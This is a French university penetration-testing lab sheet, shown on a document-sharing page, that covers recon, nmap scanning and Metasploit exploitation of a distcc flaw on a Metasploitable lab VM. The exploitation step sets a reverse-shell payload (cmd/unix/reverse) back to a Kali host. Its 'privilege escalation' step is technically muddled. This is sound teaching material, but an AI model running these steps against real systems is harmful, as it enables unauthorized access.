Tp Metasploit

  • Uploaded by: hamza syaho
  • 0
  • 0
  • January 2021
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Tp Metasploit as PDF for free.

More details

  • Words: 480
  • Pages: 3
Loading documents preview...
Université Cadi Ayyad

Année universitaire : 2018-2019

Ecole Nationale des Sciences Appliquées

GRT2

Filière Génie Réseaux & Télécoms

Dr.Anas Abou el kalam

Marrakech

Mouhsine Elallouchi

TP 1) L’étape de reconnaissance : 1-1 Dans cette étape le pentester essaie de trouver les adresses ip ,les noms de domaines , dns , Dans notre tp on va trouver juste l@ ip du machine Vulnérable (Metasploitable) on utilisant la Commande : > ifconfig 1-2 Maintenant on a l’@ ip on va tester la connectivité entre kali linux et la machine de test En utilisant la commande : > ping @ip

2) L’étape de Scanning : Recherche des ports ouverts et des Vulnérabilités Dans cet étape on s’intéresse au ports ouverts et au services utilisés puis on passe a l’analyse des Vulnérabilités si vous avez nessus vous allez l’utiliser sinon si il n’y a pas de connexion internet On va juste faire recours a nmap le fameux outil avec un script simple juste pour comprendre la Méthodologie .

1-1 Lancez la commande > nmap –sS @ip qui va s’exécuter rapidement et qui permet de scanner : des milliers de ports par seconde sur un réseau rapide 1-2 Apres avoir analyser les ports ouverts et les services utilisés on va lancer la commande  Nmap -script vuln qui permet de voir quelque risques qui peuvent nuire a la machine 1-3 On choisit la vulnérabilité qui va nous permettre de pénétrer le système

L’utilisation de nessus permet de nous indiquer très vite la vulnérabilité la plus dangereuse C’est pas grave dans notre cas on va utiliser : distcc

3) L’étape de l’exploitation ou Gaining Access : Dans cette étape on va utilise un outil très fort : metasploit

1-1) Lancez metasploit en tapant : > msfconsole . (ca peut prendre quelque minutes ) 1-2)Recherchez la vuln distcc :

> search distcc

1-3) La recherche va nous presenter quelque exploits a utiliser alors on choisit l’exploit : En utilisant la commande : use /exploit/.. /..

N.B : Vulnérabilité – Une faille dans un système qui peut être utilisée comme un moyen d’attaque. Exploit – Un programme spécialement conçu pour exploiter une vulnérabilité.Il contient le Payload . Payload – le code à exécuter sur le système une fois que la vulnérabilité a été exploitée.

1-4) Connaitre les payloads que je peux utiliser avec l’exploit que j’ai choisit .tapez : >

Show payloads

1-5)On va utiliser le payload /cmd/unix/reverse en uitilisant la cmd : > Set payload >

Set RHOST

>

Set

LHOST

/cmd/unix/reverse @Machine vulnerable @ KALI

1-6) Maintenant on va exploiter : > Exploit Maintenant on est dans la machine vulnérable pour savoir notre position on lance la commande : > whoami

4) L’étape de l’éscalation de privilèges :

1-cliquez sur Ctrl+C pour terminer la session . 2-tapez : > exploit –j 3-tapez : > whoami

Très bien maintenant tu peut faire ce que tu veux .

Related Documents

Tp Metasploit
January 2021 2
Tp
February 2021 5
Tp Arena
February 2021 3
Tp Hitag2
February 2021 2
Tp Salmonella
February 2021 2

More Documents from "Midouri Djaffer"